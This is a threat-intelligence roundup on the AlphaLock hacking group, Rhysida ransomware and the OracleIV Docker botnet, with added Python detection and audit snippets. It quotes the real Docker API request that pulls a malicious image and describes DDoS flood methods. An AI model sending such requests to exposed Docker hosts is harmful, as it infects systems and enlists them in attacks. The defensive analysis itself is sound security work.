
CTI Roundup: AlphaLock, a New Russian Hacking Group is Discovered

Researchers discover a new Russian hacking group, Rhysida ransomware threatens multiple sectors, and a new campaign targets public Docker Engine APIs

Emerging Issue

First up in this week’s roundup, CTI investigates AlphaLock, a Russian group that trains hackers and monetizes their services through a dedicated affiliate program. Next, CTI explores a recent joint advisory on Rhysida, an emerging ransomware that is now threatening multiple sectors. CTI wraps up with an overview of a new campaign targeting publicly exposed instances of the Docker Engine API.

1. AlphaLock trains hackers, monetizes their services

Researchers have discovered a new Russian hacking group called AlphaLock that runs a pen-testing training organization. The group was discovered on a public Telegram channel that’s now private.

AlphaLock trains hackers through customized online courses. It also monetizes its services through a dedicated affiliate program — creating an end-to-end marketplace for cybercrime.

Its business model has two parts, Bazooka Code pentest training and the ALPentest hacking marketplace:

  1. Bazooka Code: The first part of their business model involves training. Here they provide hackers with customized online training courses called Bazooka Code. AlphaLock tries to avoid presenting itself as a threat actor or cybercriminal. Instead, the group claims they are simply training pen testers.
  2. The ALPentest Hacking Marketplace: The second part of AlphaLock’s business model involves the dark web forum XSS and an affiliate program where they likely plan to make most of their money. Their plan is to use newly trained hackers, or pen testers, to create a marketplace where threat actors can purchase testing services targeted at a specific organization.

Beta versions of the new marketplace revealed that threat actors would be able to list targets that they would like to pen test. Other threat actors could then attack that target, post proof, and collect the money.

The platform apparently attracted too much attention, forcing the threat actor to post a long message noting that the entire program will be moving to a new decentralized chat application known as Matrix.

Analyst comments from Tanium’s Cyber Threat Intelligence team

AlphaLock is working hard to create a brand for itself, with an entire custom online training course and marketplace. Interestingly, the group focuses more on operating like a business rather than focusing purely on technical sophistication.

As Flare points out on Bleeping Computer, this ties into the current trend of diversification and role specialization that’s taking place in cybercrime. Detailed and complex supply chains now exist that offer economies of scale for cybercriminals.

2. New joint advisory issued for Rhysida ransomware

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Multi-State Information Sharing and Analysis Center (MS-ISAC) have released a joint cybersecurity advisory to disseminate the latest activity associated with Rhysida ransomware.

Rhysida is an emerging ransomware that primarily targets the education, healthcare, manufacturing, information technology, and government sectors.

Rhysida initial access

The Rhysida ransomware actor leverages externally facing remote services like virtual private networks (VPNs) for initial access and persistence. It often attempts to authenticate to internal VPN access points with compromised but valid credentials. These logins often succeed because multifactor authentication is not enforced.

The actor has been observed executing phishing campaigns and exploiting CVE-2020-1472, a critical elevation-of-privilege vulnerability in Microsoft’s Netlogon Remote Protocol.

Living off the land

Like many threat actors, Rhysida leverages living-off-the-land techniques in its attacks. This includes creating Remote Desktop Protocol (RDP) connections for lateral movement, establishing VPN access, and using PowerShell. The actor commonly uses ipconfig, whoami, nltest, and various net commands to enumerate environments and gather information.

Rhysida’s tools

Rhysida uses several legitimate, publicly available tools in its attacks. This makes it more difficult for defenders to detect malicious activity.

Some examples include:

  • Cmd.exe: the native command line prompt utility.
  • PowerShell.exe: a native command line tool for running a Windows PowerShell session in a Command Prompt window.
  • PsExec.exe: a tool in the PsTools suite for executing processes remotely.

Some additional tools include mstsc.exe, PuTTY.exe, and PortStarter, among others.

Execution

In one Rhysida ransomware attack, the actor created two folders in the C:\ drive called “in” and “out.” These folders served as staging directories and hosted malicious executables:

  1. The in folder contained files whose names matched host names on the victim’s network, believed to have been imported via a scanning tool.
  2. The out folder had various malicious files that were deployed to aid network-wide encryption.
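Two of the behaviours described above, the burst of native enumeration commands and execution out of a top-level in/out staging folder, are simple to express as detection logic over process-creation telemetry. The following is an added example, not code from the advisory or from Tanium; the event records are constructed in the shape of Sysmon Event ID 1 fields, and the ten-minute window and three-tool threshold are assumed tuning values.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed process-creation records with Sysmon Event ID 1 style fields;
# these are illustrative, not telemetry from the advisory.
SAMPLE_EVENTS = [
    {"ts": "2023-11-10T09:00:01", "host": "WS01", "image": r"C:\Windows\System32\ipconfig.exe"},
    {"ts": "2023-11-10T09:00:05", "host": "WS01", "image": r"C:\Windows\System32\whoami.exe"},
    {"ts": "2023-11-10T09:00:09", "host": "WS01", "image": r"C:\Windows\System32\nltest.exe"},
    {"ts": "2023-11-10T09:00:14", "host": "WS01", "image": r"C:\Windows\System32\net.exe"},
    {"ts": "2023-11-10T09:30:00", "host": "WS02", "image": r"C:\Windows\System32\ipconfig.exe"},
    {"ts": "2023-11-10T11:02:00", "host": "FS01", "image": r"C:\out\enc.exe"},
]

# The enumeration binaries the advisory attributes to Rhysida (net.exe hands
# off to net1.exe, so both are included).
DISCOVERY_TOOLS = {"ipconfig.exe", "whoami.exe", "nltest.exe", "net.exe", "net1.exe"}
# Executables launched from a top-level <drive>:\in or <drive>:\out folder.
STAGING_DIR = re.compile(r"^[A-Za-z]:\\(in|out)\\", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events, window=timedelta(minutes=10), min_distinct=3):
    """Return (host, rule, detail) alerts for staging-folder execution and
    for bursts of distinct discovery tools on one host within `window`."""
    alerts = []
    per_host = defaultdict(list)
    for ev in events:
        if STAGING_DIR.match(ev["image"]):
            alerts.append((ev["host"], "staging_dir_exec", ev["image"]))
        name = basename(ev["image"])
        if name in DISCOVERY_TOOLS:
            per_host[ev["host"]].append((datetime.fromisoformat(ev["ts"]), name))
    for host, runs in per_host.items():
        runs.sort()
        for i, (start, _) in enumerate(runs):
            # Distinct tools seen in the window opening at this run.
            seen = {n for t, n in runs[i:] if t - start <= window}
            if len(seen) >= min_distinct:
                alerts.append((host, "discovery_burst", ",".join(sorted(seen))))
                break  # one alert per host is enough
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

A single ipconfig on WS02 produces nothing, which is the point of requiring several distinct tools in a short window rather than alerting on each native binary.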

Data extortion

Like most ransomware actors today, Rhysida engages in double extortion attacks by first demanding payment to decrypt data and then threatening to publish the data if the victim doesn’t pay.

The group drops its ransom note as a PDF file named “CriticalBreachDetected,” which instructs the victim to contact the group through a Tor-based portal.

Analyst comments from Tanium’s Cyber Threat Intelligence team

“Rhysida ransomware has only been around for a few months but has already claimed about 50 victims.

The group relies heavily on legitimate tools throughout multiple stages of the attack which likely enables them to remain undetected in an environment for longer.

Rhysida’s actors have also been identified operating as part of a RaaS capacity, making it possible that additional Rhysida affiliates may be seen in the future.”

3. OracleIV targets public Docker Engine APIs

Researchers at Cado Security have discovered a new campaign targeting publicly exposed instances of the Docker Engine API.

Threat actors have been seen exploiting a misconfiguration to deliver a malicious Docker container. The malware acts as a DDoS bot agent that can carry out various DoS attacks.

OracleIV initial access

As in many similar attacks, initial access began with an HTTP POST request to the /images/create endpoint of Docker’s API.

This request makes the host run the equivalent of a docker pull to retrieve the specified image from Docker Hub. It is followed by a container start command that spawns a container from the pulled image.

The command used here was:
POST /v1.43/images/create?tag=latest&fromImage=robbertignacio328832/oracleiv_latest
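Defenders can address this from both ends: confirm that no Docker daemon listens on TCP without client authentication, and watch the API for image pulls from registries the host is not expected to use. The block below is an added example, not code from Cado Security or Tanium; the daemon.json contents and request lines are constructed (the second request line is the one quoted above), and the registry allowlist is hypothetical.

```python
import json
from urllib.parse import parse_qs, urlsplit

# Constructed daemon.json contents for illustration: the first exposes the API on
# every interface with no client authentication, the second requires mutual TLS.
WEAK_DAEMON_JSON = json.dumps(
    {"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]})
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
    "tlsverify": True, "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem", "tlskey": "/etc/docker/server-key.pem",
})


def audit_daemon_config(raw):
    """Return one finding per TCP listener that accepts unauthenticated API calls."""
    cfg = json.loads(raw)
    return [f"{h}: TCP listener without tlsverify; anyone who reaches the port can pull and run images"
            for h in cfg.get("hosts", [])
            if h.startswith("tcp://") and not cfg.get("tlsverify")]


# Constructed "METHOD PATH" request lines, e.g. from a reverse proxy in front of the
# daemon. The second line is the request quoted in the report above.
SAMPLE_REQUESTS = [
    "GET /v1.43/containers/json",
    "POST /v1.43/images/create?tag=latest&fromImage=robbertignacio328832/oracleiv_latest",
    "POST /v1.43/images/create?fromImage=registry.example.internal/app/api&tag=2.1",
]
# Hypothetical allowlist of registries this host is expected to pull from.
ALLOWED_PREFIXES = ("registry.example.internal/",)


def image_pulls(requests):
    """Yield (image, tag) for each image-create call found in the request lines."""
    for line in requests:
        method, _, target = line.partition(" ")
        parts = urlsplit(target)
        if method != "POST" or not parts.path.endswith("/images/create"):
            continue
        query = parse_qs(parts.query)
        yield query.get("fromImage", [""])[0], query.get("tag", ["(unspecified)"])[0]


def unexpected_pulls(requests, allowed=ALLOWED_PREFIXES):
    """Pulls whose image is outside the allowlist. A bare 'user/name' reference
    resolves to Docker Hub, so the oracleiv_latest pull is flagged."""
    return [(img, tag) for img, tag in image_pulls(requests) if not img.startswith(allowed)]
```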

Malicious Dockerhub image

The command in this attack retrieved an image named oracleiv_latest, which was uploaded to Docker Hub by the user robbertignacio328832.

The image had over 3,000 pulls when Cado Security discovered it and appears to be regularly updated. The latest changes were pushed only three days before their report was published.

Cado Security inspected the image layers, which revealed the commands the threat actor used to retrieve the malicious payload, oracle.sh, and bake it into the resulting image. The image also included wget commands to retrieve a copy of XMRig and an associated miner configuration file.

Researchers did not observe any mining performed by this malicious container, but the inclusion of these files in the image would make this a possibility in the future.

Static analysis

Researchers focused on analyzing the oracle.sh executable embedded in the malicious container. Static analysis of this executable revealed a 64-bit, statically linked ELF with debug information intact.

They determined that the malware was written in Python and compiled with Cython. The code itself is concise and primarily dedicated to the different DoS methods.

Dynamic analysis

The bot connects back to a C2 server on port 40320 and then performs a primitive authentication in which it supplies the C2 with basic information about the environment and a hardcoded password.

After successful authentication, the C2 continuously sends “routine ping, greetz Oracle IV.” Researchers have observed the botnet being used to DDoS many targets, with a preference for UDP-based and SSL-based floods. They were able to trick the botnet agent into connecting to a mock C2 server of their own in order to issue commands and observe its behaviour.

The botnet has the following DDoS capabilities:

  • UDP: The botnet performs a UDP flood with 40k-byte packets. These exceed the link MTU and are fragmented, creating additional processing overhead on the target.
  • UDP_PPS: This capability currently seems non-functional.
  • SSL: The SSL capability opens a TCP connection, sends a large amount of data, and then closes before repeating the process.
  • SYN: This capability is identical to SSL.
  • HTTPGET: This capability is also non-functional.
  • SLOW: This is a slowloris-style attack in which the agent opens several connections to the server and repeatedly sends small amounts of data to keep the connection open.
  • FIVE: A UDP flood with 18-byte packets, likely part of the FiveM server protocol.
  • VSE: A UDP flood with 20-byte packets.
  • OVH: A UDP flood with 8-byte packets designed to circumvent OVH’s DDoS protection.

Analyst comments from Tanium’s Cyber Threat Intelligence team

This attack shows that threat actors are still interested in leveraging misconfigured internet-facing services as a means of initial access and will likely continue to do so.

Cado Security sums up this threat quite well:

The portability that containerization brings allows malicious payloads to be executed in a deterministic manner across Docker hosts, regardless of the configuration of the host itself. Whilst OracleIV is not technically a supply chain attack, users of Dockerhub should be aware that malicious container images do indeed exist in Docker’s image library.



Tanium CTI

Tanium's Cyber Threat Intelligence (CTI) analysts process and extract trends from the daily cyber landscape to curate and deliver current intel to stakeholders around threats impacting business and security.
